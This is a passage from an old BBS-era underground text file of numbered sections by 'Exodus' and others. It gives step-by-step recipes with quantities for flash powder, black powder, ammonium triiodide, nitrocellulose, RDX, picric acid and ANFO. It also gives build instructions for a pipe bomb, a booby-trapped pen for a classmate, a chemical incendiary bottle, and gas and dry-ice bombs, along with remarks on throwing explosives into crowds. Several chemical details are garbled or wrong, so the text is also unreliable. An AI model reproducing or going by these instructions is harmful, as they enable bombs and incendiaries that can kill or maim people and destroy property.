Sulfur 10% PotassiumNitrate 60% PowderedIronor 40% 1 BurnsVeryHot Magnesium 40% PotassiumChlorate 75% PhosphorusSesquisulfide 25% 8 Usedto makestrikeanywherematches AmmoniumPerchlorate 70% AluminumDust 30% 6 SolidFuelforSpace Shuttle SmallamountofIronOxide PotassiumPerchlorate 67% Magnesiumor 33% 10 FlashPowder (SodiumPerchlorate) AluminumDust 33% PotassiumPerchlorate 60% Magnesiumor 20% 8 Alternate (SodiumPerchlorate) AluminumDust 20% FlashPowder Sulfur 20% BariumNitrate 30% AluminumDust 30% 9 Alternate PotassiumPerchlorate 30% FlashPowder BariumPeroxide 90% MagnesiumDust 5% 10 Alternate AluminumDust 5% FlashPowder PotassiumPerchlorate 50% Sulfur 25% 8 SlightlyUnstable Magnesiumor AluminumDust PotassiumChlorate 67% Sensitive CalciumCarbonate Sulfur 3% PotassiumPermanganate 50% Aluminumor 25% MagnesiumDust PotassiumChlorate 75% Sulfur 10% 25% 25% RedPhosphorus 3% powderedsugar 25% 7 Unstable Ignitesifitgetswet! 25% CharcoalDust 15% 6 Unstable

27%

VeryUnstableImpact

WARNING:POTASSIUMPERMANGANATEIGNITESSPONTANEOUSLYWITHGLYCERIN!!! NOTE:Mixturesthatusessubstitutionsofsodiumperchlorateforpotassium perchloratebecomemoistureabsorbentandlessstable. Thehigherthespeednumber,thefasterthefueloxidizermixtureburnsAFTER ignition.Also,asarule,thefinerthepowder,thefastertherateofburning. Asonecaneasilysee,thereisawidevarietyoffueloxidizermixturesthat canbemadeathome.Byalteringtheamountsoffuelandoxidizer(s),different burnratescanbeachieved,butthisalsocanchangethesensitivityofthe mixture.

191.FlashPowderByDr.Tiel Hereareafewbasicprecautionstotakeifyou'recrazyenoughtoproduceyour ownflashpowder: 1. Grindtheoxidizer(KNO3,KClO3,KMnO4,KClO4etc.)separatelyinaclean vessel. 2. NEVERgrindorsiftthemixedcomposition. 3. Mixthecompositiononalargepapersheet,byrollingthecomposition backandforth. 4. Donotstoreflashcompositions,especiallyanycontainingMg. 5. Makeverysmallquantitiesatfirst,soyoucanappreciatethepowerof suchmixtures. KNO350%(byweight) Mg50% ItisveryimportanttohavetheKNO3verydry,ifevolutionofammoniais observedthentheKNO3haswaterinit.VerypureanddryKNO3isneeded.KClO3 withMgorAlmetalpowdersworksverywell.Manyhands,facesandliveshave beenlostwithsuchcompositions.KMnO4withMgorAlisalsoanextremely powerfulflashcomposition.KClO4withAlisgenerallyfoundincommercial fireworks,thisdoesnotmeanthatitissafe,itisalittlesaferthanKClO3 above.KCrO7canalsobeusedasanoxidizerforflashpowder.Thefinerthe oxidizerandthefinerthemetalpowderthemorepowerfultheexplosive.Thisof coursewillalsoincreasethesensitivityoftheflashpowder. Foraquickflashsmallquantitiescanbeburntintheopen.Largerquantities (50gormore)ignitedintheopencandetonate,theydonotneedacontainerto doso. NOTE:Flashpowderinanycontainerwilldetonate. Balancedequationsofsomeoxidizer/metalreactions.Onlymajorproductsare considered.Excessmetalpowdersaregenerallyused.Thisexcessburnswith atmosphericoxygen. 4KNO3+10Mg>2KO+2N+10MgO+Energy KClO3+2Al>KCl+AlO3+Energy 3KClO4+8Al>3KCl+4AlO3+Energy 6KMnO4+14Al>3KO+7AlO3+6Mn+Energy

MakeBlackPowderfirstifyouhaveneverworkedwithpyrotechnicmaterials, thenthinkaboutthisstuff. Dr.VanTielPh.D.Chemistry Potassiumperchlorateisalotsaferthansodium/potassiumchlorate. 192.TheExplosivePen byBlueMax

Here'saGREATlittletricktoplayonyourbestfiend(nothat'snotatypo)at school,ormaybeasapracticaljokeonafriend! MaterialsNeeded: 1. OneBallPoint"Click"pen 2. GunPowder 3. 8or10matchheads 4. 1Matchstick 5. asheetofsandpaper(1"X2")

Directions: 1. Unscrewpenandremoveallpartsbutleavethebuttoninthetop. 2. Stickthematchstickinthepartofthepenclickerwheretheother littlepartsandtheinkfillwas. 3. Rollsandpaperupandputaroundthematchstickthatisintheclicker. 4. PuttheremainingMatchHeadsinsidethepen,makesurethattheyareon theinsideonthesandpaper. 5. Putasmallpieceofpaperorsomethingintheotherendofthepenwhere theballpointcomesout. 6. Filltheendwiththepieceofpaperinitwithgunpowder.Thepaperis tokeepthepowderfromspilling. TheFinishedpenshouldlooklikethis: SmallPaperClogGunPowderMatches&Sandpaper\ || \|| \_________________|____________________|________ <_______________________________|_______________|=== 193.RevisedPipeBombsbyExodus First,oneflattensoneendofacopperoraluminumpipecarefully,makingsure nottotearorripthepiping.Then,theflatendofthepipeshouldbefolded overatleastonce,ifthisdoesnotripthepipe.Afuseholeshouldbedrilled inthepipenearthenowclosedend,andthefuseshouldbeinserted. Next,thebombbuilderwouldpartiallyfillthecasingwithaloworder explosive,andpackitwithalargewadoftissuepaper.Hewouldthenflatten andfoldtheotherendofthepipewithapairofpliers.Ifhewasnottoo dumb,hewoulddothisslowly,sincetheprocessoffoldingandbendingmetal givesoffheat,whichcouldsetofftheexplosive.Adiagramispresentedbelow: (Ill.#1) ++ ++ o ++ ++ Fig.1Pipewithoneendflattenedandfuseholedrilled.[Topview] (Ill.#2) ++ ++ o ++ ++ Fig.2Pipewithoneendflattenedandfoldedup.[Topview] (Ill.#3) +FuseHole +o+++ ++++ ++ ++ ++

++ Fig.3Pipewithflattenedandfoldedend.[Sideview] 194.SAFETYTIPSHOWNOTTOGETKILLEDbyExodus An"owngoal"isthedeathofapersononyoursidefromoneofyourown devices.Itisobviousthattheseshouldbeavoidedatallcosts.Whileno safetydeviceis100%reliable,itisusuallybettertoerronthesideof caution. BASICSAFETYRULES 1. DON'TSMOKE!(Don'tlaughanerrantcigarettewipedouttheWeathermen) 2. GRINDALLINGREDIENTSSEPARATELY.It'ssurprisinghowfrictionsensitive somesupposedly"safe"explosivesreallyare. 3. ALLOWfora20%marginoferrorJustbecausetheAVERAGEburningrateof afuseis30secs/foot,don'tdependonthe5inchesstickingoutofyourpipe bombtotakeexactly2minutes. 4. OVERESTIMATETHERANGEOFYOURSHRAPNEL.Thecapfromapipebombcan oftentravelablockormoreathighvelocitiesbeforecomingtorestIfyou havetostaynearby,rememberthatifyoucanseeit,itcankillyou. 5. Whenmixingsensitivecompounds(suchasflashpowder)avoidallsources ofstaticelectricity.Mixtheingredientsbythemethodbelow: HOWTOMIXINGREDIENTS Thebestwaytomixtwodrychemicalstoformanexplosiveistodoasthe smallscalefireworksmanufacturer'sdo: Ingredients: 1largesheetofsmoothpaper(forexampleapagefromanewspaperthat doesnotusestaples) Thedrychemicalsneededforthedesiredcompound. 1. Measureouttheappropriateamountsofthetwochemicals,andpourthemin twosmallheapsnearoppositecornersofthesheet. 2. Pickupthesheetbythetwocornersnearthepowders,allowingthe powderstorolltowardsthemiddleofthesheet. 3. Byraisingonecornerandthentheother,rollthepowdersbackandforth inthemiddleoftheopensheet,takingcarenottoletthemixturespillfrom eitherofthelooseends. 4. Pourthepowderofffromthemiddleofthesheet,anduseimmediately.If itmustbestoreduseairtightcontainers(35mmfilmcanistersworknicely)and storeawayfrompeople,houses,andvaluableitems. 195.AmmoniumTriIodideCrystals byExodus

Ammoniumtriiodidecrystalsarefoulsmellingpurplecoloredcrystalsthat decomposeundertheslightestamountofheat,friction,orshock,iftheyare madewiththepurestammonia(ammoniumhydroxide)andiodine.Suchcrystalsare saidtodetonatewhenaflylandsonthem,orwhenanantwalksacrossthem. Householdammonia,however,hasenoughimpurities,suchassoapsandabrasive agents,sothatthecrystalswilldetonatewhenthrown,crushed,orheated. Ammonia,whenboughtinstorescomesinavarietyofforms.Thepineandcloudy ammoniasshouldnotbebought;onlytheclearammoniashouldbeusedtomake ammoniumtriiodidecrystals.Upondetonation,aloudreportisheard,anda cloudofpurpleiodinegasappearsaboutthedetonationsite.Whateverthe unfortunatesurfacethatthecrystalwasdetonateduponwillusuallyberuined, assomeoftheiodineinthecrystalisthrownaboutinasolidform,andiodine iscorrosive.Itleavesnasty,ugly,permanentbrownishpurplestainson whateveritcontacts.Iodinegasisalsobadnews,sinceitcandamagelungs,

anditsettlestothegroundandstainsthingstherealso.Touchingiodine leavesbrownstainsontheskinthatlastforaboutaweek,unlesstheyare immediatelyandvigorouslywashedoff.Whilesuchacompoundwouldhavelittle usetoaseriousterrorist,avandalcouldutilizethemindamagingproperty. Or,aterroristcouldthrowseveralofthemintoacrowdasadistraction,an actionwhichwouldpossiblyinjureafewpeople,butfrightenalmostanyone, sinceasmallcrystalthatmaynotbeseenwhenthrownproducesaratherloud explosion. Ammoniumtriiodidecrystalscouldbeproducedinthefollowingmanner: Materials: Iodinecrystals Clearammonia(ammoniumhydroxide,forthesuicidal) Equipment: Funnelandfilterpaper Papertowels Twothrowawayglassjars 1. Placeabouttwoteaspoonsofiodineintooneoftheglassjars.Thejars mustbothbethrowawaybecausetheywillneverbecleanagain. 2. Addenoughammoniatocompletelycovertheiodine. 3. Placethefunnelintotheotherjar,andputthefilterpaperinthe funnel.Thetechniqueforputtingfilterpaperinafunnelistaughtinevery basicchemistrylabclass:foldthecircularpaperinhalf,sothatasemi circleisformed.Then,folditinhalfagaintoformatrianglewithonecurved side.Pullonethicknessofpaperouttoformacone,andplacetheconeinto thefunnel. 4. Afterallowingtheiodinetosoakintheammoniaforawhile,pourthe solutionintothepaperinthefunnelthroughthefilterpaper. 5. Whilethesolutionisbeingfiltered,putmoreammoniaintothefirstjar towashanyremainingcrystalsintothefunnelassoonasitdrains. 6. Collectallthepurplishcrystalswithouttouchingthebrownfilterpaper, andplacethemonthepapertowelstodryforaboutanhour.Makesurethatthey arenottooclosetoanylightsorothersourcesofheat,astheycouldwell detonate.Whiletheyarestillwet,dividethewetmaterialintoeightpiecesof aboutthesamesize. 7. Aftertheydry,gentlyplacethecrystalsontoaonesquareinchpieceof ducttape.Coveritwithasimilarpiece,andgentlypresstheducttape togetheraroundthecrystal,makingsurenottopressthecrystalitself. Finally,cutawaymostoftheexcessducttapewithapairofscissors,and storethecrystalsinacooldrysafeplace.Theyhaveashelflifeofabouta week,andtheyshouldbestoredinindividualcontainersthatcanbethrown away,sincetheyhaveatendencytoslowlydecompose,aprocesswhichgivesoff iodinevapors,whichwillstainwhatevertheysettleon.Onepossiblewayto increasetheirshelflifeistostoretheminairtightcontainers.Tousethem, simplythrowthemagainstanysurfaceorplacethemwheretheywillbestepped onorcrushed. 196.SulfuricAcid&Amm.NitrateIII byExodus

Sulfuricacidisfartoodifficulttomakeoutsideofalaboratoryorindustrial plant.However,itisreadilyavailableinanunchargedcarbattery.Aperson wishingtomakesulfuricacidwouldsimplyremovethetopofacarbatteryand pourtheacidintoaglasscontainer.Therewouldprobablybepiecesoflead fromthebatteryintheacidwhichwouldhavetoberemoved,eitherbyboiling orfiltration.Theconcentrationofthesulfuricacidcanalsobeincreasedby boilingit;verypuresulfuricacidpoursslightlyfasterthancleanmotoroil. AMMONIUMNITRATE

Ammoniumnitrateisaverypowerfulbutinsensitivehighorderexplosive.It couldbemadeveryeasilybypouringnitricacidintoalargeflaskinanice bath.Then,bysimplypouringhouseholdammoniaintotheflaskandrunningaway, ammoniumnitratewouldbeformed.Afterthematerialshavestoppedreacting,one wouldsimplyhavetoleavethesolutioninawarmplaceuntilallofthewater andanyunneutralizedammoniaoracidhaveevaporated.Therewouldbeafine powderformed,whichwouldbeammoniumnitrate.Itmustbekeptinanairtight container,becauseofitstendencytopickupwaterfromtheair.Thecrystals formedintheaboveprocesswouldhavetobeheatedVERYgentlytodriveoffthe remainingwater. 197.BlackPowderIII byExodus

FirstmadebytheChineseforuseinfireworks,blackpowderwasfirstusedin weaponsandexplosivesinthe12thcentury.Itisverysimpletomake,butitis notverypowerfulorsafe.Onlyabout50%ofblackpowderisconvertedtohot gasseswhenitisburned;theotherhalfismostlyveryfineburnedparticles. Blackpowderhasonemajorproblem...itcanbeignitedbystaticelectricity. Thisisverybad,anditmeansthatthematerialmustbemadewithwoodenor claytools.Anyway,amisguidedindividualcouldmanufactureblackpowderat homewiththefollowingprocedure: MATERIALS: PotassiumNitrate(75g)orSodiumNitrate(75g) Sulfur(10g) Charcoal(15g) DistilledWater EQUIPMENT: Claygrindingbowlandclaygrinderorwoodensaladbowlandwooden spoon PlasticBags(3) 300500mLBeaker(1) CoffeePotorHeatSource 1. Placeasmallamountofthepotassiumorsodiumnitrateinthegrinding bowlandgrindittoaveryfinepowder.Dothistoallofthepotassiumor sodiumnitrate,andstorethegroundpowderinoneoftheplasticbags. 2. Dothesamethingtothesulfurandcharcoal,storingeachchemicalina separateplasticbag. 3. Placeallofthefinelygroundpotassiumorsodiumnitrateinthebeaker, andaddjustenoughboilingwatertothechemicaltogetitallwet. 4. Addthecontentsoftheotherplasticbagstothewetpotassiumorsodium nitrate,andmixthemwellforseveralminutes.Dothisuntilthereisnomore visiblesulfurorcharcoal,oruntilthemixtureisuniversallyblack. 5. Onawarmsunnyday,putthebeakeroutsideinthedirectsunlight. Sunlightisreallythebestwaytodryblackpowder,sinceitisnevertoohot, butitishotenoughtoevaporatethewater. 6. Scrapetheblackpowderoutofthebeaker,andstoreitinasafe container.Plasticisreallythesafestcontainer,followedbypaper.Never storeblackpowderinaplasticbag,sinceplasticbagsarepronetogenerate staticelectricity. 198.NitroCellulose byExodus

Nitrocelluloseisusuallycalled"gunpowder"or"guncotton".Itismorestable thanblackpowder,anditproducesamuchgreatervolumeofhotgas.Italso burnsmuchfasterthanblackpowderwhenitisinaconfinedspace.Finally, nitrocelluloseisfairlyeasytomake,asoutlinedbythefollowingprocedure: MATERIALS:

Cotton(Cellulose) ConcentratedNitricAcid ConcentratedSulfuricAcid DistilledWater

EQUIPMENT: Two(2)200300mLBeakers FunnelandFilterPaper BlueLitmusPaper 1. Pour10ccofconcentratedsulfuricacidintothebeaker.Addtothis10 ccofconcentratednitricacid. 2. Immediatelyadd0gmofcotton,andallowittosoakforexactly3 minutes. 3. Removethenitrocotton,andtransferittoabeakerofdistilledwaterto washitin. 4. Allowthematerialtodry,andthenrewashit. 5. Afterthecottonisneutralwhentestedwithlitmuspaper,itisreadyto bedriedandstored. 199.RDXII byExodus

RDX,alsocalledCyclonite,orcompositionC1(whenmixedwithplasticisers)is oneofthemostvaluableofallmilitaryexplosives.Thisisbecauseithasmore than150%ofthepowerofTNT,andismucheasiertodetonate.Itshouldnotbe usedalone,sinceitcanbesetoffbyanottoosevereshock.Itisless sensitivethanMercuryFulminateorNitroglycerin,butitisstilltoosensitive tobeusedalone. NO 2 | N /\RDXMOLECULE /\ HCHC /22 /| ONNNO 2\/2 \/ \/ CH 2 RDXcanbemadebythesurprisinglysimplemethodoutlinedhereafter.Itismuch easiertomakeinthehomethanallotherhighexplosives,withthepossible exceptionofAmmoniumNitrate. MATERIALS: HexamineorMethenamineFuelTablets(50g) ConcentratedNitricAcid(550mL) AmmoniumNitrate DistilledWater TableSalt Ice EQUIPMENT: 500mLBeaker GlassStirringRod FunnelandFilterPaper IceBathContainer(PlasticBucket)

CentigradeThermometer BlueLitmusPaper

1. Placethebeakerintheicebath,(seesteps34)andcarefullypour550 mLofconcentratedNitricAcidintothebeaker. 2. Whentheacidhascooledtobelow20C,addsmallamountsofthecrushed fueltabletstothebeaker.Thetemperaturewillrise,anditmustbekeptbelow 30C,ordireconsequencescouldresult.Stirthemixture. 3. Dropthetemperaturebelow0C,eitherbyaddingmoreiceandsalttothe oldicebath,orbycreatinganewicebath.AmmoniumNitratecouldbeaddedto theoldicebath,sinceitbecomescoldwhenitisputinwater.Continue stirringthemixture,keepingthetemperaturebelow0Cforatleasttwenty minutes. 4. Pourthemixtureintoaliterofcrushedice.Shakeandstirthemixture, andallowittomelt.Onceithasmelted,filteroutthecrystals,anddispose ofthecorrosiveliquid. 5. Placethecrystalsintoonehalfaliterofboilingdistilledwater. Filterthecrystals,andtestthemwiththebluelitmuspaper.Repeatsteps4 and5untilthelitmuspaperremainsblue.Thiswillmakethecrystalsmore stableandsafe. 6. Storethecrystalswetuntilreadyforuse.Allowthemtodrycompletely usingthem.RDXisnotstableenoughtousealoneasanexplosive. 7. CompositionC1canbemadebymixing88.3%RDX(byweight)with11.1% mineraloil,and0.6%lecithin.Kneedthesematerialtogetherinaplasticbag. Thisisonewaytodesensitizetheexplosive. 8. HMXisamixtureofTNTandRDX;theratiois50/50,byweight.Itisnot assensitive,andisalmostaspowerfulasstraightRDX. 9. ByaddingammoniumnitratetothecrystalsofRDXafterstep5,itshould bepossibletodesensitizetheRDXandincreaseitspower,sinceammonium nitrateisveryinsensitiveandpowerful.Sodiumorpotassiumnitratecouldalso beadded;asmallquantityissufficienttostabilizetheRDX. 10. RDXdetonatesatarateof8550meters/secondwhenitiscompressedtoa densityof15g/cubiccm. 200.BlackGateBBS byExodus

KGt psd1 dt3.90d_dt ++H 1*(20!)YOUSUCKEliTeMaIL 2*(20!)REALBAD=(NOLEECHES)= FL,PA,NY,CA 2RinGdoWN9600'sCoNNexioNs 1LocAl57000!@ 0+DaYWarEZd_hSysopExodus 201.ANFOS byDeanS.

ANFOisanacronymforAmmoniumNitrateFuelOilSolution.AnANFOsolvesthe onlyothermajorproblemwithammoniumnitrate:itstendencytopickupwater vaporfromtheair.Thisresultsintheexplosivefailingtodetonatewhensuch anattemptismade.Thisisrectifiedbymixing94%(byweight)ammoniumnitrate with6%fueloil,orkerosene.Thekerosenekeepstheammoniumnitratefrom absorbingmoisturefromtheair.AnANFOalsorequiresalargeshockwavetoset itoff. AboutANFO LatelytherewasbeenalotsaidaboutvariousANFOmixtures.Thesearemixtures ofAmmoniumNitratewithFuelOil.Thisformsareasonablypowerfulcommercial explosive,withitsprimarybenefitbeingthefactthatitischeap.BulkANFO shouldrunsomewherearound912centsthepound.Thisisdirtcheapcomparedto 40%nitrogeldynamitesat1to2dollarsthepound.Tokeepthecostdown,it isfrequentlymixedattheboreholebyabulktruck,whichhasapneumatic deliveryhopperofANprills(that'spelletstomostoftheworld)andatankof fueloil.Itisstronglyrecommendedthatadyeofsomesort,preferablyredbe addedtothefueloiltomakeiteasiertodistinguishtreatedANexplosivefrom untreatedoxidizer. ANFOisnotwithoutitsproblems.Tobeginwith,itisnotthatsensitiveto detonation.NumbereightcapsarenotreliablewhenusedwithANFO.Booster chargesmustbeusedtoavoiddudblastholes.Commonboostersincludesticksof variousdynamites,smallpoursofwatergelexplosives,dupont'sdetaprimecast boosters,andAtlas'spowerprimercastexplosive.Theneedtouseboosters raisesthecost.Secondly,ANFOisverywatersusceptible.Itdissolvesinit, orabsorbsitfromtheatmosphere,andbecomesquiteworthlessrealquick.It mustbeprotectedfromwaterwithboreholeliners,andstillmustbeshotreal quick.Third,ANFOhasalowdensity,somewherearound.85.ThismeansANFO sacksfloat,whichisnogood,andadditionally,thelowdensitymeansthepower issomewhatlow.Generally,themoreweightofexplosiveonecanplaceina hole,themoreeffective.ANFOblownintotheholewithapneumaticsystem fracturesasitisplaces,raisingthedensitytoabout.9or.92.Thedelivery systemaddstothecost,andmustbeantistaticinnature.Aluminumisaddedto somecommercial,cartridgepackagedANFOstoraisethedensitythisalso raisespowerconsiderable,andafewofthesemixturesarereliablycap sensitive. Nowthan,forformulations.Anearlierarticlementioned2kilosofammonium nitrate,andIbelieve5to6litersofdiesel.Thismixtureisextremelyover fueled,andI'dbesurprisedifitworked.DupontrecommendsaANtoFOratioof 93%ANto7%FObyweight.Hardlyanyoilatall.Moreoilmakesthemixture lessexplosivebyabsorbingdetonationenergy,andexcessfuelmakesdetonation byproductshealthhazardsasthemixtureisoxygenpoor.Notethatcommercial fertilizerproductsdonotworkaswellastheporousANprillsdupontsells, becausefertilizersarecoatedwithvariousmaterialsmeanttosealthemfrom moisture,whichkeeptheoilfrombeingabsorbed. AnotherproblemwithANFO:forreliabledetonation,itneedsconfinement,either fromacasing,borehole,etc,orfromthemassofthecharge.Thus,apileof thestuffwithaboosterinitislikelytoscatterandburnratherthanexplode whentheboosterisshot.Inboreholes,orreasonablestrongcasings(cardboard, orheavyplasticfilmsacks)thestuffdetonatedquitewell.Sowillbigpiles. That'showtheexplosivepotentialwasdiscovered:asmalloilfreighterrammed abulkchemicalship.Overseveralhoursthecargoesintermixedtosomedegree, andreachedcriticalmass.Realbigbang.Ausefulwaytoobtainthecontainment neededistoreplacethefueloilwithawaxfuel.MixtheANwithjustenough meltedwaxtoformacohesivemixture,moldintoshape.Thewaxfuels,and retainsthemixture.ThisiswhattheUSmilitaryusesasamanplacedcratering charge.Themilitaryliteraturestatesthiscanbesetoffbyablastingcap, butitisimportanttorememberthemilitaryblastingcapsareconsiderablemore

powerfulthancommercialones.Themilitaryrightlyinsistsonreliability,and thusastrongcap(maybe7080percentstrongerthancommercial).Theyalsotend togooverboardwhencalculatingdemolitioncharges....,buthey,whodoesn't... Twomanualsofinterest:Duponts"Blaster'sHandbook",$20manualmainlyuseful forrockandseismographicoperations.Atlas's"PowderManual"or"Manualof RockBlasting"(Iforgetthetitle,itsintheoffice).Thisisa$60book,well worththecash,dealingwiththeabovetwotopics,plusdemolitions,andnon quarryblasting. Incidentally,combiningfueloilandammoniumnitrateconstitutesthe manufactureofahighexplosive,andrequiresafederalpermittomanufacture andstore.Eventheminesthatmixitonsiterequirethepermittomanufacture. Thosewhodon'tmanufactureonlyneedpermitstostore.Thosewhodon'tstore neednopermits,whichincludesmostofus:anyone,atleastintheUSmay purchaseexplosives,providedtheyare21orolder,andhavenocriminalrecord. Notetheyoughttobeusedimmediately,becauseyoudoneedalicensetostore. Notealsothatcommercialexplosivescontainquantitiesoftracingagents,which makeitrealeasyfortheFBItotracetheexplosiontothepurchaser,so please,nobodyblowupanybanks,orphanages,oroldfolkshomes,okay. 202.PicricAcid byExodus

Picricacid,alsoknownasTriNitroPhenol,orTNP,isamilitaryexplosive thatismostoftenusedasaboosterchargetosetoffanotherlesssensitive explosive,suchasTNT.It'sanotherexplosivethatisfairlysimpletomake, assumingthatonecanacquiretheconcentratedsulfuricandnitricacids.Its procedureformanufactureisgiveninmanycollegechemistrylabmanuals,andis easytofollow.Themainproblemwithpicricacidisitstendencytoform dangerouslysensitiveandunstablepicratesalts,suchaspotassiumpicrate.For thisreason,itisusuallymadeintoasaferform,suchasammoniumpicrate, alsocalledexplosiveD.Asocialdeviantwouldprobablyuseaformulasimilar totheonepresentedheretomakepicricacid. MATERIALS: Phenol(9g) ConcentratedSulfuricAcid(12mL) ConcentratedNitricAcid(38mL) DistilledWater EQUIPMENT: 500mLFlask AdjustableHeatSource 1000mLBeakerorothercontainersuitableforboilingin FilterPaperandFunnel GlassStirringRod 1. Place9gramsofphenolintothe500mLflask,andcarefullyadd12mL ofconcentratedsulfuricacidandstirthemixture. 2. Put400mLoftapwaterintothe1000mLbeakerorboilingcontainerand bringthewatertoagentleboil. 3. Afterwarmingthe500mLflaskunderhottapwater,placeitinthe boilingwater,andcontinuetostirthemixtureofphenolandacidforabout thirtyminutes.Afterthirtyminutes,taketheflaskout,andallowittocool foraboutfiveminutes. 4. Pourouttheboilingwaterusedabove,andafterallowingthecontainerto cool,useittocreateanicebath,similartotheoneusedinsteps34.Place the500mLflaskwiththemixedacidanphenolintheicebath.Add38mLof concentratednitricacidinsmallamounts,stirringthemixtureconstantly.A vigorousbut"harmless"reactionshouldoccur.Whenthemixturestopsreacting vigorously,taketheflaskoutoftheicebath.

5. Warmtheicebathcontainer,ifitisglass,andthenbeginboilingmore tapwater.Placetheflaskcontainingthemixtureintheboilingwater,andheat itintheboilingwaterfor1to2hours. 6. Add100mLofcolddistilledwatertothesolution,andchillitinanice bathuntilitiscold. 7. Filterouttheyellowishwhitepicricacidcrystalsbypouringthe solutionthroughthefilterpaperinthefunnel.Collecttheliquidanddispose ofitinasafeplace,sinceitiscorrosive. 8. Washoutthe500mLflaskwithdistilledwater,andputthecontentsof thefilterpaperintheflask.Add300mLofwater,andshakevigorously. 9. Refilterthecrystals,andallowthemtodry. 10. Storethecrystalsinasafeplaceinaglasscontainer,sincetheywill reactwithmetalcontainerstoproducepicratesthatcouldexplode spontaneously. 203.CHEMICALFIREBOTTLE byExodus

Thechemicalfirebottleisreallyanadvancedmolotovcocktail.Ratherthan usingtheburningclothtoignitetheflammableliquid,whichhasatbestafair chanceofignitingtheliquid,thechemicalfirebottleutilizestheveryhot andviolentreactionbetweensulfuricacidandpotassiumchlorate.Whenthe containerbreaks,thesulfuricacidinthemixtureofgasolinespraysontothe papersoakedinpotassiumchlorateandsugar.Thepaper,whenstruckbythe acid,instantlyburstsintoawhiteflame,ignitingthegasoline.Thechanceof failuretoignitethegasolineislessthan2%,andcanbereducedto0%,if thereisenoughpotassiumchlorateandsugartospare. MATERIALS: PotassiumChlorate(2teaspoons) Sugar(2teaspoons) ConcentratedSulfuricAcid(4oz.) Gasoline(8oz.) EQUIPMENT: 12oz.glassbottle Capforbottle,withplasticinside CookingPanwithraisededges PaperTowels GlassorPlasticCupandSpoon 1. Testthecapofthebottlewithafewdropsofsulfuricacidtomakesure thattheacidwillnoteatawaythebottlecapduringstorage.Iftheacideats throughitin24hours,anewtopmustbefoundandtested,untilacapthat theaciddoesnoteatthroughisfound.Aglasstopisexcellent. 2. Carefullypour8oz.ofgasolineintotheglassbottle. 3. Carefullypour4oz.ofconcentratedsulfuricacidintotheglassbottle. Wipeupanyspillsofacidonthesidesofthebottle,andscrewthecaponthe bottle.Washthebottle'soutsidewithplentyofwater.Setitasidetodry. 4. Putabouttwoteaspoonsofpotassiumchlorateandabouttwoteaspoonsof sugarintotheglassorplasticcup.Addaboutcupofboilingwater,orenough todissolveallofthepotassiumchlorateandsugar. 5. Placeasheetofpapertowelinthecookingpanwithraisededges.Fold thepapertowelinhalf,andpourthesolutionofdissolvedpotassiumchlorate andsugaronituntilitisthoroughlywet.Allowthetoweltodry. 6. Whenitisdry,putsomeglueontheoutsideoftheglassbottle containingthegasolineandsulfuricacidmixture.Wrapthepapertowelaround thebottle,makingsurethatitstickstoitinallplaces.Storethebottlein aplacewhereitwillnotbebrokenortippedover. 7. Whenfinished,thesolutioninthebottleshouldappearastwodistinct liquids,adarkbrownishredsolutiononthebottom,andaclearsolutionon top.Thetwosolutionswillnotmix.Tousethechemicalfirebottle,simply throwitatanyhardsurface.

8. NEVEROPENTHEBOTTLE,SINCESOMESULFURICACIDMIGHTBEONTHECAP,WHICH COULDTRICKLEDOWNTHESIDEOFTHEBOTTLEANDIGNITETHEPOTASSIUMCHLORATE, CAUSINGAFIREAND/OREXPLOSION. 9. Totestthedevice,tearasmallpieceofthepapertoweloffthebottle, andputafewdropsofsulfuricacidonit.Thepapertowelshouldimmediately burstintoawhiteflame. BOTTLEDGASEXPLOSIVES Bottledgas,suchasbutaneforrefillinglighters,propaneforpropanestoves orforbunsenburners,canbeusedtoproduceapowerfulexplosion.Tomakesuch adevice,allthatasimplemindedanarchistwouldhavetodowouldbetotake hiscontainerofbottledgasandplaceitaboveacanofSternoorother gelatinizedfuel,lightthefuelandrun.Dependingonthefuelused,andonthe thicknessofthefuelcontainer,theliquidgaswillboilandexpandtothe pointofburstingthecontainerinaboutfiveminutes. Intheory,thegaswouldimmediatelybeignitedbytheburninggelatinizedfuel, producingalargefireballandexplosion.Unfortunately,theburstingofthe bottledgascontaineroftenputsoutthefuel,thuspreventingtheexpandinggas fromigniting.Byusingametalbuckethalffilledwithgasoline,however,the chancesofignitionarebetter,sincethegasolineislesslikelytobe extinguished.Placingthecanisterofbottledgasonabedofburningcharcoal soakedingasolinewouldprobablybethemosteffectivewayofsecuringignition oftheexpandinggas,sincealthoughtheburstingofthegascontainermayblow outtheflameofthegasoline,theburningcharcoalshouldimmediatelyreignite it.Nitrousoxide,hydrogen,propane,acetylene,oranyotherflammablegaswill donicely. Duringtherecentgulfwar,fuel/airbombsweretoutedasbeingsecondonlyto nuclearweaponsintheirdevastatingeffects.Thesearebasicallysimilartothe abovedevices,exceptthatanexplosivechargeisusedtorupturethefuel containeranddisperseitoverawidearea.Asecondchargeisusedtodetonate thefuel.Thereactionissaidtoproduceamassiveshockwaveandtoburnall theoxygeninalargearea,causingsuffocation. Anotherbenefitofafuelairexplosiveisthatthegaswillseepintofortified bunkersandotherpartiallysealedspaces,soalargebombplacedinabuilding wouldresultinthedestructionofthemajorityofsurroundingrooms,rendering itstructurallyunsound. 204.DryIce byExodus

Thereisnostandardformulaforadryicebomb,howeveragenericformisas follows: Takea2litersodabottle,emptyitcompletely,thenaddabout3/4LbofDry Ice(crushedworksbest)and(optional)aquantityofwater. Dependingontheconditionofthebottle,theweather,andtheamountand temperatureofthebottlethebombwillgooffin30seconds5minutes. Withoutanywateradded,the2literbottleswillgooftenin37minutesif droppedintoawarmriver,andin45minutesto1hoursinopenair. TheexplosionsoundsequivalenttoanM100._Plastic_16oz.sodabottlesand1 literbottlesworkalmostaswellasdothe2liters,howeverglassbottles aren'tnearlyasloud,andcanproducedangerousshrapnel. Remember,theseareLOUD!Aclassmateofminesetup10bottlesinanearbypark withoutaddingwater.Afterthefirsttwowentoff(therewasabout10minutes betweenexplosions)thePolicearrivedandspentthenexthourtryingtofind theguywhotheythoughtwassettingoffM100'sallaroundthem...

